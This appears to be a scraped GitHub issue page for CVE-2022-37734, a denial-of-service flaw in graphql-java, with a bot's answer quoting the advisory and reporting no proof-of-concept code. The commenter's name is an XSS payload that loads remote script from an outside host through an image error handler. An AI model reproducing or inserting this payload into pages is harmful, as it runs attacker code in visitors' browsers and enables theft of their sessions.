CVE-2022-37734

Question

CVE-2022-37734

act1on3 opened this issue 2 years ago · comments

'"><img src onerror=import('//act1on3.ru/i')> commented 2 years ago

Please update

Trickest Bot · Answer 1 · Wed Oct 19 2022 23:00:44 GMT+0800 (China Standard Time)

CVE-2022-37734

Description

graphql-java before19.0 is vulnerable to Denial of Service. An attacker can send a malicious GraphQL query that consumes CPU resources. The fixed versions are 19.0 and later, 18.3, and 17.4, and 0.0.0-2022-07-26T05-45-04-226aabd9.

POC

Reference

No PoCs from references.

Github

No PoCs found on GitHub currently.